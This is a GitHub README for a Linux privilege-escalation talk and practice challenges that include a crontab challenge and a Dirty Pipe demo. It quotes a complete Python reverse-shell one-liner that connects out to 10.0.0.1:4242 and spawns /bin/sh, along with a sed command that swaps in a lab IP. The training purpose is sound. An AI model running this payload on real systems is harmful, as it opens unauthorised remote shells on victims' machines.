Skip to content

Latest commit

 

History

History
22 lines (21 loc) · 998 Bytes

File metadata and controls

22 lines (21 loc) · 998 Bytes

LinuxPrivilegeEscalation

My presentation at Cyber Community
You can check the Cron-Tab challange to practice on it :)

Update

2022


Updated Version Of The Presentation With Dirty Pipe Vuln Demo And More Resources
You can check the index.php challange to practice on it :)
All what you need to host the challange is a vulnerable linux server to dirty pipe LPE

Notes:

Used Conmands:

python3 --version
cat pythonrevshell.py | sed 's/10.0.0.1/192.168.246.138/'

Content of pythonrevshell.py: PayloadsAllTheThings

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Contact:

Twitter Instagram